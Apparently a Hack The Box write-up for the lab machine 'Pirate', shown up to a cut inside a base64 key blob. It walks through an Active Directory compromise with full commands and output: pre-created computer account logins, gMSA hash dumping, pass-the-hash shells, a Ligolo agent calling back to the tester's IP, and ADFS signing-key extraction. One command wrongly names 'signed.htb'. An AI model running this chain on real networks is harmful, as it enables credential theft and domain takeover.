Hack The Box / WINDOWS / 2026-09-05
Hack The Box — Pirate (Windows)
We begin with a low-privileged account on the Pirate domain, which allows us to discover pre-created computer accounts and extract sensitive gMSA passwords. Using these credentials, we gain access to the WEB01 machine. From there, a NTLM relay attack allows us to impersonate Administrator on WEB01. We harvest the credentials of a.white. Finally, we manipulate the SPNs of WEB01 to perform a resource-based constrained delegation attack, allowing us to impersonate Administrator on the domain controller.
Machine Information
As is common in real-life penetration tests, you start the Pirate box with credentials for the following account: pentest / p3nt3st2025!&.
Target
- IP:
10.129.8.49
Port scan
sudo nmap -sC -sV 10.129.8.49 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-01 04:12:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T04:14:07+00:00; +8h17m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after: 2026-06-09T14:05:15
| MD5: 5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1: 0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
|_SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
443/tcp open https?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T04:14:08+00:00; +8h17m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after: 2026-06-09T14:05:15
| MD5: 5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1: 0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
|_SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after: 2026-06-09T14:05:15
| MD5: 5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1: 0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
|_SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
|_ssl-date: 2026-03-01T04:14:07+00:00; +8h17m15s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T04:14:07+00:00; +8h17m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T14:05:15
| Not valid after: 2026-06-09T14:05:15
| MD5: 5c8e b331 ef90 890a d8e3 feaa b53c 2910
| SHA-1: 0128 c655 2aed c190 efff d3eb a2fb 034b fa86 ab69
|_SHA-256: a2c7 cecc 4854 8f57 a69c 7302 9621 8bb1 6796 ee2d ad60 c34b b005 9a00 a1e6 3358
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49905/tcp open msrpc Microsoft Windows RPC
49928/tcp open msrpc Microsoft Windows RPC
49953/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add dc01.pirate.htb and pirate.htb to /etc/hosts.
Initial enumeration
nxc smb 10.129.8.49 -u pentest -p 'p3nt3st2025!&' --shares
SMB 10.129.8.49 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.8.49 445 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
SMB 10.129.8.49 445 DC01 [*] Enumerated shares
SMB 10.129.8.49 445 DC01 Share Permissions Remark
SMB 10.129.8.49 445 DC01 ----- ----------- ------
SMB 10.129.8.49 445 DC01 ADMIN$ Remote Admin
SMB 10.129.8.49 445 DC01 C$ Default share
SMB 10.129.8.49 445 DC01 IPC$ READ Remote IPC
SMB 10.129.8.49 445 DC01 NETLOGON READ Logon server share
SMB 10.129.8.49 445 DC01 SYSVOL READ Logon server share
nxc ldap 10.129.8.49 -u pentest -p 'p3nt3st2025!&'
[*] Initializing LDAP protocol database
LDAP 10.129.8.49 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.8.49 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
ldapdomaindump pirate.htb -u 'pirate.htb\pentest' -p 'p3nt3st2025!&'
bloodhound-ce-python -u 'pentest' -p 'p3nt3st2025!&' -ns 10.129.8.49 -d 'pirate.htb' -dc 'dc01.pirate.htb' -c All --zip
We get a zip file.
Start bloodhound. On Kali linux:
sudo bloodhound
Upload the zip file.
Get a list of users:
nxc smb dc01.pirate.htb -d pirate.htb -u 'pentest' -p 'p3nt3st2025!&' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users.txt
Pre-Windows 2000 enumeration
From BloodHound, we see that the MS01$ computer account is part of the Pre-Windows 2000 Compatible Access group.
Computer accounts that are members of this group may have their password set to the lowercase username without the $, in this case ms01.
More details here: https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-precreated-computer/
Computer accounts of this type can be enumerated with nxc:
nxc ldap dc01.pirate.htb -d pirate.htb -u 'pentest' -p 'p3nt3st2025!&' -M pre2k
LDAP 10.129.11.148 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP 10.129.11.148 389 DC01 [+] pirate.htb\pentest:p3nt3st2025!&
PRE2K 10.129.11.148 389 DC01 Pre-created computer account: MS01$
PRE2K 10.129.11.148 389 DC01 Pre-created computer account: EXCH01$
PRE2K 10.129.11.148 389 DC01 [+] Found 2 pre-created computer accounts. Saved to /home/kali/.nxc/modules/pre2k/pirate.htb/precreated_computers.txt
PRE2K 10.129.11.148 389 DC01 [+] Successfully obtained TGT for ms01@pirate.htb
PRE2K 10.129.11.148 389 DC01 [+] Successfully obtained TGT for exch01@pirate.htb
PRE2K 10.129.11.148 389 DC01 [+] Successfully obtained TGT for 2 pre-created computer accounts. Saved to /home/kali/.nxc/modules/pre2k/ccache
Notice that login with nxc smb does not work:
nxc smb dc01.pirate.htb -d pirate.htb -u 'MS01$' -p 'ms01'
SMB 10.129.11.148 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None)
SMB 10.129.11.148 445 DC01 [-] pirate.htb\MS01$:ms01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
However, we can request a Kerberos ticket:
getTGT.py -dc-ip 10.129.11.148 pirate.htb/'MS01$':'ms01'
[*] Saving ticket in MS01$.ccache
export KRB5CCNAME='MS01$.ccache'
nxc smb dc01.pirate.htb -d pirate.htb -u 'MS01$' -k --use-kcache
SMB dc01.pirate.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB dc01.pirate.htb 445 DC01 [+] pirate.htb\MS01$ from ccache
Reading gMSA passwords
From BloodHound, we see that MS01$ is part of the Domain Secure Servers group, which has ReadGMSAPassword relationships to the gMSA_ADCS_prod$ and gMSA_ADFS_prod$ accounts.
Modify /etc/krb5.conf.
Add:
[realms]
PIRATE.HTB = {
kdc = dc01.pirate.htb
admin_server = dc01.pirate.htb
}
[domain_realm]
.pirate.htb = PIRATE.HTB
pirate.htb = PIRATE.HTB
Download gMSADumper: https://github.com/micahvandeusen/gMSADumper
python gMSADumper/gMSADumper.py -k -d pirate.htb -l dc01.pirate.htb
Users or groups who can read password for gMSA_ADCS_prod$:
> Domain Secure Servers
gMSA_ADCS_prod$:::304106f739822ea2ad8ebe23f802d078
gMSA_ADCS_prod$:aes256-cts-hmac-sha1-96:4b663e093cdb8283541c5c40068022668fbd92681eb4433d2ec0ccfc0607298d
gMSA_ADCS_prod$:aes128-cts-hmac-sha1-96:3727b5300502b7a4a8de0f429299b942
Users or groups who can read password for gMSA_ADFS_prod$:
> Domain Secure Servers
gMSA_ADFS_prod$:::8126756fb2e69697bfcb04816e685839
gMSA_ADFS_prod$:aes256-cts-hmac-sha1-96:8c689efdec9f1b8554b1eb1b631ea311db74453427d1273369e6268bcd742e6c
gMSA_ADFS_prod$:aes128-cts-hmac-sha1-96:74ec76de3c9bf2e77d42ecc9aaa1096c
nxc smb dc01.pirate.htb -u 'gMSA_ADCS_prod$' -H '304106f739822ea2ad8ebe23f802d078'
SMB 10.129.11.148 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None)
SMB 10.129.11.148 445 DC01 [+] pirate.htb\gMSA_ADCS_prod$:304106f739822ea2ad8ebe23f802d078
nxc smb dc01.pirate.htb -u 'gMSA_ADFS_prod$' -H '8126756fb2e69697bfcb04816e685839'
SMB 10.129.11.148 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.11.148 445 DC01 [+] pirate.htb\gMSA_ADFS_prod$:8126756fb2e69697bfcb04816e685839
From BloodHound, we notice that both accounts are members of the Remote Management Users group, so we can connect to the victim machine with Evil-WinRM.
evil-winrm -i dc01.pirate.htb -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078
We get a PowerShell shell.
evil-winrm -i dc01.pirate.htb -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
We get a PowerShell shell.
ADFS abuse
Download ADFSDump.exe and upload it to the victim machine.
Run it from the gMSA_ADFS_prod$ shell:
.\ADFSDump.exe
## Extracting Private Key from Active Directory Store
[-] Domain is pirate.htb
[-] Private Key: 7C-5B-51-35-74-58-CD-98-F0-0F-7E-CC-07-F4-60-BB-FC-7D-E9-68-95-07-4C-4E-FD-29-1B-5A-75-3A-2C-E4
Then there are some errors.
route print
We notice that there is the 192.168.100.0 subnet.
python3 bloodyAD/bloodyAD.py --host dc01.signed.htb -d signed.htb --dc-ip 10.129.11.148 -u pentest -p 'p3nt3st2025!&' get dnsDump
We notice:
recordName: WEB01.pirate.htb
A: 192.168.100.2
To access WEB01, we need to pivot.
Pivoting with ligolo
We use Ligolo.
Download Ligolo.
On the attacking machine:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
Upload agent.exe to the victim machine, for example to C:\tmp.
On the victim machine:
.\agent.exe -connect 10.10.16.149:11601 -ignore-cert
We connected to the proxy, and now we have a session.
ligolo-ng » session
Choose session 1.
start
Now run:
sudo ip route add 192.168.100.0/24 dev ligolo
ping 192.168.100.2
PING 192.168.100.2 (192.168.100.2) 56(84) bytes of data.
64 bytes from 192.168.100.2: icmp_seq=1 ttl=64 time=104 ms
We can communicate with WEB01.
We can also access WEB01 with Evil-WinRM:
evil-winrm -i 192.168.100.2 -u 'gMSA_ADCS_prod$' -H 304106f739822ea2ad8ebe23f802d078
We do not get a PowerShell shell.
evil-winrm -i 192.168.100.2 -u 'gMSA_ADFS_prod$' -H 8126756fb2e69697bfcb04816e685839
We get a PowerShell shell.
hostname
WEB01
ls \Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/15/2026 7:37 PM a.white
d----- 6/9/2025 10:11 AM Administrator
d----- 6/9/2025 6:55 AM Administrator.PIRATE
d----- 6/9/2025 7:31 AM gMSA_ADFS_prod$
d----- 1/15/2026 6:40 PM gMSA_ADFS_prod$.PIRATE
d-r--- 6/8/2025 1:29 PM Public
netstat -a -p tcp
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 WEB01:0 LISTENING
TCP 0.0.0.0:135 WEB01:0 LISTENING
TCP 0.0.0.0:443 WEB01:0 LISTENING
TCP 0.0.0.0:445 WEB01:0 LISTENING
TCP 0.0.0.0:808 WEB01:0 LISTENING
TCP 0.0.0.0:1500 WEB01:0 LISTENING
TCP 0.0.0.0:1501 WEB01:0 LISTENING
TCP 0.0.0.0:5985 WEB01:0 LISTENING
TCP 0.0.0.0:47001 WEB01:0 LISTENING
TCP 0.0.0.0:49443 WEB01:0 LISTENING
TCP 0.0.0.0:49664 WEB01:0 LISTENING
TCP 0.0.0.0:49665 WEB01:0 LISTENING
TCP 0.0.0.0:49666 WEB01:0 LISTENING
TCP 0.0.0.0:49667 WEB01:0 LISTENING
TCP 0.0.0.0:49668 WEB01:0 LISTENING
TCP 0.0.0.0:49701 WEB01:0 LISTENING
TCP 0.0.0.0:49715 WEB01:0 LISTENING
TCP 192.168.100.2:135 pirate:50487 ESTABLISHED
TCP 192.168.100.2:135 pirate:50498 ESTABLISHED
TCP 192.168.100.2:135 pirate:50632 ESTABLISHED
TCP 192.168.100.2:135 pirate:64410 ESTABLISHED
TCP 192.168.100.2:139 WEB01:0 LISTENING
TCP 192.168.100.2:5985 pirate:56794 TIME_WAIT
TCP 192.168.100.2:5985 pirate:56805 TIME_WAIT
TCP 192.168.100.2:5985 pirate:56806 ESTABLISHED
TCP 192.168.100.2:49664 pirate:50207 ESTABLISHED
TCP 192.168.100.2:49805 pirate:ldap ESTABLISHED
TCP 192.168.100.2:50003 pirate:epmap TIME_WAIT
TCP 192.168.100.2:50004 pirate:epmap TIME_WAIT
TCP 192.168.100.2:50005 pirate:49667 ESTABLISHED
TCP 192.168.100.2:50006 pirate:49680 TIME_WAIT
TCP 192.168.100.2:50009 pirate:49680 TIME_WAIT
TCP 192.168.100.2:50012 pirate:49680 ESTABLISHED
Upload ADFSDump.exe to WEB01.
.\ADFSDump.exe
## Extracting Private Key from Active Directory Store
[-] Domain is pirate.htb
!!! Exception getting private key: System.DirectoryServices.DirectoryServicesCOMException (0x80072020): An operations error occurred.
at System.DirectoryServices.DirectoryEntry.Bind(Boolean throwIfFail)
at System.DirectoryServices.DirectoryEntry.Bind()
at System.DirectoryServices.DirectoryEntry.get_AdsObject()
at System.DirectoryServices.DirectorySearcher.FindAll(Boolean findMoreThanOne)
at ADFSDump.ActiveDirectory.ADSearcher.GetPrivKey(Dictionary`2 arguments)
!!! Are you sure you are running as the AD FS service account?
## Reading Encrypted Signing Key from Database
[-] Encrypted Token Signing Key Begin
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' |
base64 -d > TKSKey.bin
[-] Encrypted Token Signing Key End
[-] Certificate value: 5DCD035FC74E2D920F28234D0F30029DE2AC16A0
[-] Store location value: CurrentUser
[-] Store name value: My
## Reading The Issuer Identifier
[-] Issuer Identifier: http://adfs.pirate.htb/adfs/services/trust
[-] Detected AD FS 2019
[-] Uncharted territory! This might not work...
## Reading Relying Party Trust Information from Database
We can perform a Golden SAML attack.
Useful site: https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/golden-saml-attack/
echo -n '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